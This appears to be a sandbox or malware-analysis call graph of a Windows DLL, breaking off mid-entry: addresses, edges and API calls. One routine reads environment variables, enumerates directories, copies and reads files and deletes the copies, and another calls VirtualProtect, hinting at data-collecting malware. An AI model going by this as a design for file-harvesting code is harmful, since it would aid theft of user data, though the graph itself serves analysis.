QueryPerformanceCounter 6111->6114 6113->6108 6114->6113 7137 1000724e GetProcessHeap 7138 1000284f 7139 10002882 std::exception::exception 27 API calls 7138->7139 7140 1000285d 7139->7140 7437 10003c90 RtlUnwind 7535 100036d0 7536 100036e2 7535->7536 7538 100036f0 @_EH4_CallFilterFunc@8 7535->7538 7537 10002ada _ValidateLocalCookies 5 API calls 7536->7537 7537->7538 7141 10005351 7142 10005360 7141->7142 7143 10005374 7141->7143 7142->7143 7146 1000571e _free 20 API calls 7142->7146 7144 1000571e _free 20 API calls 7143->7144 7145 10005386 7144->7145 7147 1000571e _free 20 API calls 7145->7147 7146->7143 7148 10005399 7147->7148 7149 1000571e _free 20 API calls 7148->7149 7150 100053aa 7149->7150 7151 1000571e _free 20 API calls 7150->7151 7152 100053bb 7151->7152 7539 100073d5 7540 100073e1 ___scrt_is_nonwritable_in_current_image 7539->7540 7551 10005671 RtlEnterCriticalSection 7540->7551 7542 100073e8 7543 10008be3 27 API calls 7542->7543 7544 100073f7 7543->7544 7550 10007406 7544->7550 7552 10007269 GetStartupInfoW 7544->7552 7549 10007417 _abort 7563 10007422 7550->7563 7551->7542 7553 10007286 7552->7553 7554 10007318 7552->7554 7553->7554 7555 10008be3 27 API calls 7553->7555 7558 1000731f 7554->7558 7556 100072af 7555->7556 7556->7554 7557 100072dd GetFileType 7556->7557 7557->7556 7560 10007326 7558->7560 7559 10007369 GetStdHandle 7559->7560 7560->7559 7561 100073d1 7560->7561 7562 1000737c GetFileType 7560->7562 7561->7550 7562->7560 7566 100056b9 RtlLeaveCriticalSection 7563->7566 7565 10007429 7565->7549 7566->7565 7567 10004ed7 7568 10006d60 51 API calls 7567->7568 7569 10004ee9 7568->7569 7578 10007153 GetEnvironmentStringsW 7569->7578 7572 10004ef4 7574 1000571e _free 20 API calls 7572->7574 7575 10004f29 7574->7575 7576 10004eff 7577 1000571e _free 20 API calls 7576->7577 7577->7572 7579 1000716a 7578->7579 7589 100071bd 7578->7589 7580 10007170 WideCharToMultiByte 7579->7580 7583 1000718c 7580->7583 7580->7589 7581 100071c6 FreeEnvironmentStringsW 7582 10004eee 7581->7582 7582->7572 7590 10004f2f 7582->7590 7584 100056d0 21 API calls 7583->7584 7585 10007192 7584->7585 7586 100071af 7585->7586 7587 10007199 WideCharToMultiByte 7585->7587 7588 1000571e _free 20 API calls 7586->7588 7587->7586 7588->7589 7589->7581 7589->7582 7591 10004f44 7590->7591 7592 1000637b _abort 20 API calls 7591->7592 7596 10004f6b 7592->7596 7593 1000571e _free 20 API calls 7595 10004fe9 7593->7595 7594 10004fcf 7594->7593 7595->7576 7596->7594 7597 1000637b _abort 20 API calls 7596->7597 7598 10004fd1 7596->7598 7599 1000544d ___std_exception_copy 26 API calls 7596->7599 7602 10004ff3 7596->7602 7605 1000571e _free 20 API calls 7596->7605 7597->7596 7600 10005000 20 API calls 7598->7600 7599->7596 7601 10004fd7 7600->7601 7603 1000571e _free 20 API calls 7601->7603 7604 100062bc _abort 11 API calls 7602->7604 7603->7594 7606 10004fff 7604->7606 7605->7596 6115 10002418 6116 10002420 ___scrt_release_startup_lock 6115->6116 6119 100047f5 6116->6119 6118 10002448 6120 10004804 6119->6120 6121 10004808 6119->6121 6120->6118 6124 10004815 6121->6124 6125 10005b7a _abort 20 API calls 6124->6125 6128 1000482c 6125->6128 6126 10002ada _ValidateLocalCookies 5 API calls 6127 10004811 6126->6127 6127->6118 6128->6126 7438 10004a9a 7441 10005411 7438->7441 7442 1000541d _abort 7441->7442 7443 10005af6 _abort 38 API calls 7442->7443 7446 10005422 7443->7446 7444 100055a8 _abort 38 API calls 7445 1000544c 7444->7445 7446->7444 5857 10001c5b 5858 10001c6b ___scrt_fastfail 5857->5858 5861 100012ee 5858->5861 5860 10001c87 5862 10001324 ___scrt_fastfail 5861->5862 5863 100013b7 GetEnvironmentVariableW 5862->5863 5887 100010f1 5863->5887 5866 100010f1 57 API calls 5867 10001465 5866->5867 5868 100010f1 57 API calls 5867->5868 5869 10001479 5868->5869 5870 100010f1 57 API calls 5869->5870 5871 1000148d 5870->5871 5872 100010f1 57 API calls 5871->5872 5873 100014a1 5872->5873 5874 100010f1 57 API calls 5873->5874 5875 100014b5 lstrlenW 5874->5875 5876 100014d2 5875->5876 5877 100014d9 lstrlenW 5875->5877 5876->5860 5878 100010f1 57 API calls 5877->5878 5879 10001501 lstrlenW lstrcatW 5878->5879 5880 100010f1 57 API calls 5879->5880 5881 10001539 lstrlenW lstrcatW 5880->5881 5882 100010f1 57 API calls 5881->5882 5883 1000156b lstrlenW lstrcatW 5882->5883 5884 100010f1 57 API calls 5883->5884 5885 1000159d lstrlenW lstrcatW 5884->5885 5886 100010f1 57 API calls 5885->5886 5886->5876 5888 10001118 ___scrt_fastfail 5887->5888 5889 10001129 lstrlenW 5888->5889 5900 10002c40 5889->5900 5891 10001148 lstrcatW lstrlenW 5892 10001177 lstrlenW FindFirstFileW 5891->5892 5893 10001168 lstrlenW 5891->5893 5894 100011a0 5892->5894 5895 100011e1 5892->5895 5893->5892 5896 100011c7 FindNextFileW 5894->5896 5899 100011aa 5894->5899 5895->5866 5896->5894 5897 100011da FindClose 5896->5897 5897->5895 5899->5896 5902 10001000 5899->5902 5901 10002c57 5900->5901 5901->5891 5901->5901 5903 10001022 ___scrt_fastfail 5902->5903 5904 100010af 5903->5904 5905 1000102f lstrcatW lstrlenW 5903->5905 5906 100010b5 lstrlenW 5904->5906 5907 100010ad 5904->5907 5908 1000105a lstrlenW 5905->5908 5909 1000106b lstrlenW 5905->5909 5933 10001e16 5906->5933 5907->5899 5908->5909 5919 10001e89 lstrlenW 5909->5919 5912 10001088 GetFileAttributesW 5912->5907 5914 1000109c 5912->5914 5913 100010ca 5913->5907 5915 10001e89 5 API calls 5913->5915 5914->5907 5925 1000173a 5914->5925 5917 100010df 5915->5917 5938 100011ea 5917->5938 5920 10002c40 ___scrt_fastfail 5919->5920 5921 10001ea7 lstrcatW lstrlenW 5920->5921 5922 10001ed1 lstrcatW 5921->5922 5923 10001ec2 5921->5923 5922->5912 5923->5922 5924 10001ec7 lstrlenW 5923->5924 5924->5922 5926 10001747 ___scrt_fastfail 5925->5926 5953 10001cca 5926->5953 5930 1000199f 5930->5907 5931 10001824 ___scrt_fastfail _strlen 5931->5930 5973 100015da 5931->5973 5934 10001e29 5933->5934 5937 10001e4c 5933->5937 5935 10001e2d lstrlenW 5934->5935 5934->5937 5936 10001e3f lstrlenW 5935->5936 5935->5937 5936->5937 5937->5913 5939 1000120e ___scrt_fastfail 5938->5939 5940 10001e89 5 API calls 5939->5940 5941 10001220 GetFileAttributesW 5940->5941 5942 10001235 5941->5942 5943 10001246 5941->5943 5942->5943 5945 1000173a 35 API calls 5942->5945 5944 10001e89 5 API calls 5943->5944 5946 10001258 5944->5946 5945->5943 5947 100010f1 56 API calls 5946->5947 5948 1000126d 5947->5948 5949 10001e89 5 API calls 5948->5949 5950 1000127f ___scrt_fastfail 5949->5950 5951 100010f1 56 API calls 5950->5951 5952 100012e6 5951->5952 5952->5907 5954 10001cf1 ___scrt_fastfail 5953->5954 5955 10001d0f CopyFileW CreateFileW 5954->5955 5956 10001d44 DeleteFileW 5955->5956 5957 10001d55 GetFileSize 5955->5957 5962 10001808 5956->5962 5958 10001ede 22 API calls 5957->5958 5959 10001d66 ReadFile 5958->5959 5960 10001d94 CloseHandle DeleteFileW 5959->5960 5961 10001d7d CloseHandle DeleteFileW 5959->5961 5960->5962 5961->5962 5962->5930 5963 10001ede 5962->5963 5965 1000222f 5963->5965 5966 1000224e 5965->5966 5969 10002250 5965->5969 5981 1000474f 5965->5981 5986 100047e5 5965->5986 5966->5931 5968 10002908 5970 100035d2 __CxxThrowException@8 RaiseException 5968->5970 5969->5968 5993 100035d2 5969->5993 5971 10002925 5970->5971 5971->5931 5974 1000160c _strcat _strlen 5973->5974 5975 1000163c lstrlenW 5974->5975 6081 10001c9d 5975->6081 5977 10001655 lstrcatW lstrlenW 5978 10001678 5977->5978 5979 10001693 ___scrt_fastfail 5978->5979 5980 1000167e lstrcatW 5978->5980 5979->5931 5980->5979 5996 10004793 5981->5996 5984 1000478f 5984->5965 5985 10004765 6002 10002ada 5985->6002 5991 100056d0 _abort 5986->5991 5987 1000570e 6015 10006368 5987->6015 5989 100056f9 RtlAllocateHeap 5990 1000570c 5989->5990 5989->5991 5990->5965 5991->5987 5991->5989 5992 1000474f _abort 7 API calls 5991->5992 5992->5991 5995 100035f2 RaiseException 5993->5995 5995->5968 5997 1000479f ___scrt_is_nonwritable_in_current_image 5996->5997 6009 10005671 RtlEnterCriticalSection 5997->6009 5999 100047aa 6010 100047dc 5999->6010 6001 100047d1 _abort 6001->5985 6003 10002ae3 6002->6003 6004 10002ae5 IsProcessorFeaturePresent 6002->6004 6003->5984 6006 10002b58 6004->6006 6014 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6006->6014 6008 10002c3b 6008->5984 6009->5999 6013 100056b9 RtlLeaveCriticalSection 6010->6013 6012 100047e3 6012->6001 6013->6012 6014->6008 6018 10005b7a GetLastError 6015->6018 6019 10005b93 6018->6019 6020 10005b99 6018->6020 6037 10005e08 6019->6037 6025 10005bf0 SetLastError 6020->6025 6044 1000637b 6020->6044 6024 10005bb3 6051 1000571e 6024->6051 6026 10005bf9 6025->6026 6026->5990 6030 10005bb9 6032 10005be7 SetLastError 6030->6032 6031 10005bcf 6064 1000593c 6031->6064 6032->6026 6035 1000571e _free 17 API calls 6036 10005be0 6035->6036 6036->6025 6036->6032 6069 10005c45 6037->6069 6039 10005e2f 6040 10005e47 TlsGetValue 6039->6040 6041 10005e3b 6039->6041 6040->6041 6042 10002ada _ValidateLocalCookies 5 API calls 6041->6042 6043 10005e58 6042->6043 6043->6020 6049 10006388 _abort 6044->6049 6045 100063c8 6048 10006368 _free 19 API calls 6045->6048 6046 100063b3 RtlAllocateHeap 6047 10005bab 6046->6047 6046->6049 6047->6024 6057 10005e5e 6047->6057 6048->6047 6049->6045 6049->6046 6050 1000474f _abort 7 API calls 6049->6050 6050->6049 6052 10005752 _free 6051->6052 6053 10005729 HeapFree 6051->6053 6052->6030 6053->6052 6054 1000573e 6053->6054 6055 10006368 _free 18 API calls 6054->6055 6056 10005744 GetLastError 6055->6056 6056->6052 6058 10005c45 _abort 5 API calls 6057->6058 6059 10005e85 6058->6059 6060 10005ea0 TlsSetValue 6059->6060 6061 10005e94 6059->6061 6060->6061 6062 10002ada _ValidateLocalCookies 5 API calls 6061->6062 6063 10005bc8 6062->6063 6063->6024 6063->6031 6075 10005914 6064->6075 6070 10005c71 6069->6070 6071 10005c75 __crt_fast_encode_pointer 6069->6071 6070->6071 6072 10005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6070->6072 6074 10005c95 6070->6074 6071->6039 6072->6070 6073 10005ca1 GetProcAddress 6073->6071 6074->6071 6074->6073 6076 10005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6075->6076 6077 10005938 6076->6077 6078 100058c4 6077->6078 6079 10005758 _abort 20 API calls 6078->6079 6080 100058e8 6079->6080 6080->6035 6082 10001ca6 _strlen 6081->6082 6082->5977 7607 100020db 7610 100020e7 ___scrt_is_nonwritable_in_current_image 7607->7610 7608 100020f6 7609 10002110 dllmain_raw 7609->7608 7611 1000212a 7609->7611 7610->7608 7610->7609 7615 1000210b 7610->7615 7620 10001eec 7611->7620 7613 10002177 7613->7608 7614 10001eec 31 API calls 7613->7614 7616 1000218a 7614->7616 7615->7608 7615->7613 7618 10001eec 31 API calls 7615->7618 7616->7608 7617 10002193 dllmain_raw 7616->7617 7617->7608 7619 1000216d dllmain_raw 7618->7619 7619->7613 7621 10001ef7 7620->7621 7622 10001f2a dllmain_crt_process_detach 7620->7622 7623 10001f1c dllmain_crt_process_attach 7621->7623 7624 10001efc 7621->7624 7629 10001f06 7622->7629 7623->7629 7625 10001f01 7624->7625 7626 10001f12 7624->7626 7625->7629 7630 1000240b 7625->7630 7635 100023ec 7626->7635 7629->7615 7643 100053e5 7630->7643 7736 10003513 7635->7736 7638 100023f5 7638->7629 7641 10002408 7641->7629 7642 1000351e 7 API calls 7642->7638 7649 10005aca 7643->7649 7646 1000351e 7725 10003820 7646->7725 7648 10002415 7648->7629 7650 10005ad4 7649->7650 7651 10002410 7649->7651 7652 10005e08 _abort 11 API calls 7650->7652 7651->7646 7653 10005adb 7652->7653 7653->7651 7654 10005e5e _abort 11 API calls 7653->7654 7655 10005aee 7654->7655 7657 100059b5 7655->7657 7658 100059c0 7657->7658 7662 100059d0 7657->7662 7663 100059d6 7658->7663 7661 1000571e _free 20 API calls 7661->7662 7662->7651 7664 100059e9 7663->7664 7667 100059ef 7663->7667 7665 1000571e _free 20 API calls 7664->7665 7665->7667 7666 1000571e _free 20 API calls 7668 100059fb 7666->7668 7667->7666 7669 1000571e _free 20 API calls 7668->7669 7670 10005a06 7669->7670 7671 1000571e _free 20 API calls 7670->7671 7672 10005a11 7671->7672 7673 1000571e _free 20 API calls 7672->7673 7674 10005a1c 7673->7674 7675 1000571e _free 20 API calls 7674->7675 7676 10005a27 7675->7676 7677 1000571e _free 20 API calls 7676->7677 7678 10005a32 7677->7678 7679 1000571e _free 20 API calls 7678->7679 7680 10005a3d 7679->7680 7681 1000571e _free 20 API calls 7680->7681 7682 10005a48 7681->7682 7683 1000571e _free 20 API calls 7682->7683 7684 10005a56 7683->7684 7689 1000589c 7684->7689 7695 100057a8 7689->7695 7691 100058c0 7692 100058ec 7691->7692 7708 10005809 7692->7708 7694 10005910 7694->7661 7696 100057b4 ___scrt_is_nonwritable_in_current_image 7695->7696 7703 10005671 RtlEnterCriticalSection 7696->7703 7699 100057be 7700 1000571e _free 20 API calls 7699->7700 7702 100057e8 7699->7702 7700->7702 7701 100057f5 _abort 7701->7691 7704 100057fd 7702->7704 7703->7699 7707 100056b9 RtlLeaveCriticalSection 7704->7707 7706 10005807 7706->7701 7707->7706 7709 10005815 ___scrt_is_nonwritable_in_current_image 7708->7709 7716 10005671 RtlEnterCriticalSection 7709->7716 7711 1000581f 7717 10005a7f 7711->7717 7713 10005832 7721 10005848 7713->7721 7715 10005840 _abort 7715->7694 7716->7711 7718 10005ab5 __fassign 7717->7718 7719 10005a8e __fassign 7717->7719 7718->7713 7719->7718 7720 10007cc2 __fassign 20 API calls 7719->7720 7720->7718 7724 100056b9 RtlLeaveCriticalSection 7721->7724 7723 10005852 7723->7715 7724->7723 7726 1000384b ___vcrt_freefls@4 7725->7726 7728 1000382d 7725->7728 7726->7648 7727 1000383b 7730 10003ba2 ___vcrt_FlsSetValue 6 API calls 7727->7730 7728->7727 7731 10003b67 7728->7731 7730->7726 7732 10003a82 try_get_function 5 API calls 7731->7732 7733 10003b81 7732->7733 7734 10003b99 TlsGetValue 7733->7734 7735 10003b8d 7733->7735 7734->7735 7735->7727 7742 10003856 7736->7742 7738 100023f1 7738->7638 7739 100053da 7738->7739 7740 10005b7a _abort 20 API calls 7739->7740 7741 100023fd 7740->7741 7741->7641 7741->7642 7743 10003862 GetLastError 7742->7743 7744 1000385f 7742->7744 7745 10003b67 ___vcrt_FlsGetValue 6 API calls 7743->7745 7744->7738 7746 10003877 7745->7746 7747 100038dc SetLastError 7746->7747 7748 10003ba2 ___vcrt_FlsSetValue 6 API calls 7746->7748 7753 10003896 7746->7753 7747->7738 7749 10003890 7748->7749 7750 100038b8 7749->7750 7751 10003ba2 ___vcrt_FlsSetValue 6 API calls 7749->7751 7749->7753 7752 10003ba2 ___vcrt_FlsSetValue 6 API calls 7750->7752 7750->7753 7751->7750 7752->7753 7753->7747 6129 1000281c 6132 10002882 6129->6132 6135 10003550 6132->6135 6134 1000282a 6136 1000358a 6135->6136 6137 1000355d 6135->6137 6136->6134 6137->6136 6138 100047e5 ___std_exception_copy 21 API calls 6137->6138 6139 1000357a 6138->6139 6139->6136 6141 1000544d 6139->6141 6142 1000545a 6141->6142 6144 10005468 6141->6144 6142->6144 6148 1000547f 6142->6148 6143 10006368 _free 20 API calls 6145 10005470 6143->6145 6144->6143 6150 100062ac 6145->6150 6147 1000547a 6147->6136 6148->6147 6149 10006368 _free 20 API calls 6148->6149 6149->6145 6153 10006231 6150->6153 6152 100062b8 6152->6147 6154 10005b7a _abort 20 API calls 6153->6154 6155 10006247 6154->6155 6156 100062a6 6155->6156 6159 10006255 6155->6159 6164 100062bc IsProcessorFeaturePresent 6156->6164 6158 100062ab 6160 10006231 _abort 26 API calls 6158->6160 6161 10002ada _ValidateLocalCookies 5 API calls 6159->6161 6162 100062b8 6160->6162 6163 1000627c 6161->6163 6162->6152 6163->6152 6165 100062c7 6164->6165 6168 100060e2 6165->6168 6169 100060fe ___scrt_fastfail 6168->6169 6170 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6169->6170 6173 100061fb ___scrt_fastfail 6170->6173 6171 10002ada _ValidateLocalCookies 5 API calls 6172 10006219 GetCurrentProcess TerminateProcess 6171->6172 6172->6158 6173->6171 7754 10004bdd 7755 10004c08 7754->7755 7756 10004bec 7754->7756 7758 10006d60 51 API calls 7755->7758 7756->7755 7757 10004bf2 7756->7757 7759 10006368 _free 20 API calls 7757->7759 7760 10004c0f GetModuleFileNameA 7758->7760 7761 10004bf7 7759->7761 7762 10004c33 7760->7762 7763 100062ac _abort 26 API calls 7761->7763 7777 10004d01 7762->7777 7764 10004c01 7763->7764 7769 10004c72 7772 10004d01 38 API calls 7769->7772 7770 10004c66 7771 10006368 _free 20 API calls 7770->7771 7776 10004c6b 7771->7776 7774 10004c88 7772->7774 7773 1000571e _free 20 API calls 7773->7764 7775 1000571e _free 20 API calls 7774->7775 7774->7776 7775->7776 7776->7773 7779 10004d26 7777->7779 7781 10004d86 7779->7781 7789 100070eb 7779->7789 7780 10004c50 7783 10004e76 7780->7783 7781->7780 7782 100070eb 38 API calls 7781->7782 7782->7781 7784 10004e8b 7783->7784 7785 10004c5d 7783->7785 7784->7785 7786 1000637b _abort 20 API calls 7784->7786 7785->7769 7785->7770 7787 10004eb9 7786->7787 7788 1000571e _free 20 API calls 7787->7788 7788->7785 7792 10007092 7789->7792 7793 100054a7 __fassign 38 API calls 7792->7793 7794 100070a6 7793->7794 7794->7779 7153 10007260 GetStartupInfoW 7154 10007286 7153->7154 7156 10007318 7153->7156 7154->7156 7159 10008be3 7154->7159 7157 100072af 7157->7156 7158 100072dd GetFileType 7157->7158 7158->7157 7160 10008bef ___scrt_is_nonwritable_in_current_image 7159->7160 7161 10008c13 7160->7161 7162 10008bfc 7160->7162 7172 10005671 RtlEnterCriticalSection 7161->7172 7163 10006368 _free 20 API calls 7162->7163 7165 10008c01 7163->7165 7166 100062ac _abort 26 API calls 7165->7166 7167 10008c0b _abort 7166->7167 7167->7157 7168 10008c4b 7180 10008c72 7168->7180 7170 10008c1f 7170->7168 7173 10008b34 7170->7173 7172->7170 7174 1000637b _abort 20 API calls 7173->7174 7175 10008b46 7174->7175 7178 10005eb7 11 API calls 7175->7178 7179 10008b53 7175->7179 7176 1000571e _free 20 API calls 7177 10008ba5 7176->7177 7177->7170 7178->7175 7179->7176 7183 100056b9 RtlLeaveCriticalSection 7180->7183 7182 10008c79 7182->7167 7183->7182 7447 100081a0 7448 100081d9 7447->7448 7449 100081dd 7448->7449 7460 10008205 7448->7460 7450 10006368 _free 20 API calls 7449->7450 7451 100081e2 7450->7451 7453 100062ac _abort 26 API calls 7451->7453 7452 10008529 7454 10002ada _ValidateLocalCookies 5 API calls 7452->7454 7455 100081ed 7453->7455 7456 10008536 7454->7456 7457 10002ada _ValidateLocalCookies 5 API calls 7455->7457 7459 100081f9 7457->7459 7460->7452 7461 100080c0 7460->7461 7462 100080db 7461->7462 7463 10002ada _ValidateLocalCookies 5 API calls 7462->7463 7464 10008152 7463->7464 7464->7460 7795 1000a1e0 7798 1000a1fe 7795->7798 7797 1000a1f6 7800 1000a203 7798->7800 7799 1000aa53 21 API calls 7802 1000a42f 7799->7802 7800->7799 7801 1000a298 7800->7801 7801->7797 7802->7797 7184 10009d61 7185 10009d81 7184->7185 7188 10009db8 7185->7188 7187 10009dab 7190 10009dbf 7188->7190 7189 10009e20 7191 1000a90e 7189->7191 7192 1000aa17 21 API calls 7189->7192 7190->7189 7194 10009ddf 7190->7194 7191->7187 7193 10009e6e 7192->7193 7193->7187 7194->7191 7195 1000aa17 21 API calls 7194->7195 7196 1000a93e 7195->7196 7196->7187 7465 100021a1 ___scrt_dllmain_exception_filter 5825 1000c7a7 5826 1000c7be 5825->5826 5830 1000c82c 5825->5830 5826->5830 5837 1000c7e6 GetModuleHandleA 5826->5837 5828 1000c835 GetModuleHandleA 5831 1000c83f 5828->5831 5829 1000c872 5830->5828 5830->5829 5830->5831 5831->5830 5832 1000c85f GetProcAddress 5831->5832 5832->5830 5833 1000c7dd 5833->5830 5833->5831 5834 1000c800 GetProcAddress 5833->5834 5834->5830 5835 1000c80d VirtualProtect 5834->5835 5835->5830 5836 1000c81c VirtualProtect 5835->5836 5836->5830 5838 1000c7ef 5837->5838 5846 1000c82c 5837->5846 5849 1000c803 GetProcAddress 5838->5849 5840 1000c7f4 5843 1000c800 GetProcAddress 5840->5843 5840->5846 5841 1000c872 5842 1000c835 GetModuleHandleA 5845 1000c83f 5842->5845 5844 1000c80d VirtualProtect 5843->5844 5843->5846 5844->5846 5847 1000c81c VirtualProtect 5844->5847 5845->5846 5848 1000c85f GetProcAddress 5845->5848 5846->5841 5846->5842 5846->5845 5847->5846 5848->5846 5850 1000c82c 5849->5850 5851 1000c80d VirtualProtect 5849->5851 5853 1000c872 5850->5853 5854 1000c835 GetModuleHandleA 5850->5854 5851->5850 5852 1000c81c VirtualProtect 5851->5852 5852->5850 5856 1000c83f 5854->5856 5855 1000c85f GetProcAddress 5855->5856 5856->5850 5856->5855 6174 1000742b 6175 10007430 6174->6175 6176 10007453 6175->6176 6178 10008bae 6175->6178 6179 10008bdd 6178->6179 6180 10008bbb 6178->6180 6179->6175 6181 10008bd7 6180->6181 6182 10008bc9 RtlDeleteCriticalSection 6180->6182 6183 1000571e _free 20 API calls 6181->6183 6182->6181 6182->6182 6183->6179 7197 1000ac6b 7198 1000ac84 __startOneArgErrorHandling 7197->7198 7200 1000acad __startOneArgErrorHandling 7198->7200 7201 1000b2f0 7198->7201 7202 1000b329 __startOneArgErrorHandling 7201->7202 7203 1000b5c1 __raise_exc RaiseException 7202->7203 7204 1000b350 __startOneArgErrorHandling 7202->7204 7203->7204 7205 1000b393 7204->7205 7206 1000b36e 7204->7206 7207 1000b8b2 __startOneArgErrorHandling 20 API calls 7205->7207 7212 1000b8e1 7206->7212 7209 1000b38e __startOneArgErrorHandling 7207->7209 7210 10002ada _ValidateLocalCookies 5 API calls 7209->7210 7211 1000b3b7 7210->7211 7211->7200 7213 1000b8f0 7212->7213 7214 1000b90f __startOneArgErrorHandling 7213->7214 7215 1000b964 __startOneArgErrorHandling 7213->7215 7216 100078a3 __startOneArgErrorHandling 5 API calls 7214->7216 7217 1000b8b2 __startOneArgErrorHandling 20 API calls 7215->7217 7218 1000b950 7216->7218 7220 1000b95d 7217->7220 7219 1000b8b2 __startOneArgErrorHandling 20 API calls 7218->7219 7218->7220 7219->7220 7220->7209 7466 100060ac 7467 100060b7 7466->7467 7469 100060dd 7466->7469 7468 100060c7 FreeLibrary 7467->7468 7467->7469 7468->7467 7221 1000506f 7222 10005081 7221->7222 7223 10005087 7221->7223 7224 10005000 20 API calls 7222->7224 7224->7223 6184 10005630 6185 1000563b 6184->6185 6187 10005664 6185->6187 6189 10005660 6185->6189 6190 10005eb7 6185->6190 6197 10005688 6187->6197 6191 10005c45 _abort 5 API calls 6190->6191 6192 10005ede 6191->6192 6193 10005efc InitializeCriticalSectionAndSpinCount 6192->6193 6196 10005ee7 6192->6196 6193->6196 6194 10002ada _ValidateLocalCookies 5 API calls 6195 10005f13 6194->6195 6195->6185 6196->6194 6198 100056b4 6197->6198 6199 10005695 6197->6199 6198->6189 6200 1000569f RtlDeleteCriticalSection 6199->6200 6200->6198 6200->6200 7225 10003370 7236 10003330 7225->7236 7237 10003342 7236->7237 7238 1000334f 7236->7238 7239 10002ada _ValidateLocalCookies 5 API calls 7237->7239 7239->7238 7803 100063f0 7804 10006400 7803->7804 7807 10006416 7803->7807 7805 10006368 _free 20 API calls 7804->7805 7806 10006405 7805->7806 7809 100062ac _abort 26 API calls 7806->7809 7810 10006480 7807->7810 7815 10006561 7807->7815 7822 10006580 7807->7822 7808 10004e76 20 API calls 7811 100064e5 7808->7811 7817 1000640f 7809->7817 7810->7808 7813 100064ee 7811->7813 7819 10006573 7811->7819 7833 100085eb 7811->7833 7814 1000571e _free 20 API calls 7813->7814 7814->7815 7842 1000679a 7815->7842 7820 100062bc _abort 11 API calls 7819->7820 7821 1000657f 7820->7821 7823 1000658c 7822->7823 7823->7823 7824 1000637b _abort 20 API calls 7823->7824 7825 100065ba 7824->7825 7826 100085eb 26 API calls 7825->7826 7827 100065e6 7826->7827 7828 100062bc _abort 11 API calls 7827->7828 7829 10006615 ___scrt_fastfail 7828->7829 7830 100066b6 FindFirstFileExA 7829->7830 7831 10006705 7830->7831 7832 10006580 26 API calls 7831->7832 7836 1000853a 7833->7836 7834 1000854f 7835 10006368 _free 20 API calls 7834->7835 7837 10008554 7834->7837 7841 1000857a 7835->7841 7836->7834 7836->7837 7839 1000858b 7836->7839 7837->7811 7838 100062ac _abort 26 API calls 7838->7837 7839->7837 7840 10006368 _free 20 API calls 7839->7840 7840->7841 7841->7838 7843 100067a4 7842->7843 7844 100067b4 7843->7844 7845 1000571e _free 20 API calls 7843->7845 7846 1000571e _free 20 API calls 7844->7846 7845->7843 7847 100067bb 7846->7847 7847->7817 7240 10009e71 7241 10009e95 7240->7241 7242 10009ee6 7241->7242 7244 10009f71 __startOneArgErrorHandling 7241->7244 7245 10009ef8 7242->7245 7248 1000aa53 7242->7248 7246 1000b2f0 21 API calls 7244->7246 7247 1000acad __startOneArgErrorHandling 7244->7247 7246->7247 7249 1000aa70 RtlDecodePointer 7248->7249 7250 1000aa80 7248->7250 7249->7250 7251 1000ab0d 7250->7251 7254 1000ab02 7250->7254 7256 1000aab7 7250->7256 7251->7254 7255 10006368 _free 20 API calls 7251->7255 7252 10002ada _ValidateLocalCookies 5 API calls 7253 1000ac67 7252->7253 7253->7245 7254->7252 7255->7254 7256->7254 7257 10006368 _free 20 API calls 7256->7257 7257->7254 7474 10003eb3 7475 10005411 38 API calls 7474->7475 7476 10003ebb 7475->7476 6201 1000543d 6202 10005440 6201->6202 6205 100055a8 6202->6205 6216 10007613 6205->6216 6208 100055b8 6210 100055c2 IsProcessorFeaturePresent 6208->6210 6215 100055e0 6208->6215 6212 100055cd 6210->6212 6213 100060e2 _abort 8 API calls 6212->6213 6213->6215 6246 10004bc1 6215->6246 6249 10007581 6216->6249 6219 1000766e 6220 1000767a _abort 6219->6220 6221 10005b7a _abort 20 API calls 6220->6221 6222 100076a1 _abort 6220->6222 6226 100076a7 _abort 6220->6226 6221->6222 6223 100076f3 6222->6223 6222->6226 6245 100076d6 6222->6245 6224 10006368 _free 20 API calls 6223->6224 6225 100076f8 6224->6225 6228 100062ac _abort 26 API calls 6225->6228 6231 1000771f 6226->6231 6263 10005671 RtlEnterCriticalSection 6226->6263 6228->6245 6232 1000777e 6231->6232 6234 10007776 6231->6234 6242 100077a9 6231->6242 6264 100056b9 RtlLeaveCriticalSection 6231->6264 6232->6242 6265 10007665 6232->6265 6237 10004bc1 _abort 28 API calls 6234->6237 6237->6232 6241 10007665 _abort 38 API calls 6241->6242 6268 1000782e 6242->6268 6243 1000780c 6244 10005af6 _abort 38 API calls 6243->6244 6243->6245 6244->6245 6292 1000bdc9 6245->6292 6296 1000499b 6246->6296 6252 10007527 6249->6252 6251 100055ad 6251->6208 6251->6219 6253 10007533 ___scrt_is_nonwritable_in_current_image 6252->6253 6258 10005671 RtlEnterCriticalSection 6253->6258 6255 10007541 6259 10007575 6255->6259 6257 10007568 _abort 6257->6251 6258->6255 6262 100056b9 RtlLeaveCriticalSection 6259->6262 6261 1000757f 6261->6257 6262->6261 6263->6231 6264->6234 6266 10005af6 _abort 38 API calls 6265->6266 6267 1000766a 6266->6267 6267->6241 6269 10007834 6268->6269 6270 100077fd 6268->6270 6295 100056b9 RtlLeaveCriticalSection 6269->6295 6270->6243 6270->6245 6272 10005af6 GetLastError 6270->6272 6273 10005b12 6272->6273 6274 10005b0c 6272->6274 6276 1000637b _abort 20 API calls 6273->6276 6278 10005b61 SetLastError 6273->6278 6275 10005e08 _abort 11 API calls 6274->6275 6275->6273 6277 10005b24 6276->6277 6279 10005b2c 6277->6279 6280 10005e5e _abort 11 API calls 6277->6280 6278->6243 6281 1000571e _free 20 API calls 6279->6281 6282 10005b41 6280->6282 6283 10005b32 6281->6283 6282->6279 6284 10005b48 6282->6284 6285 10005b6d SetLastError 6283->6285 6286 1000593c _abort 20 API calls 6284->6286 6288 100055a8 _abort 35 API calls 6285->6288 6287 10005b53 6286->6287 6289 1000571e _free 20 API calls 6287->6289 6290 10005b79 6288->6290 6291 10005b5a 6289->6291 6291->6278 6291->6285 6293 10002ada _ValidateLocalCookies 5 API calls 6292->6293 6294 1000bdd4 6293->6294 6294->6294 6295->6270 6297 100049a7 _abort 6296->6297 6304 100049bf 6297->6304 6318 10004af5 GetModuleHandleW 6297->6318 6301 10004a65 6335 10004aa5 6301->6335 6327 10005671 RtlEnterCriticalSection 6304->6327 6306 10004a3c 6308 10004a54 6306->6308 6331 10004669 6306->6331 6307 100049c7 6307->6301 6307->6306 6328 1000527a 6307->6328 6314 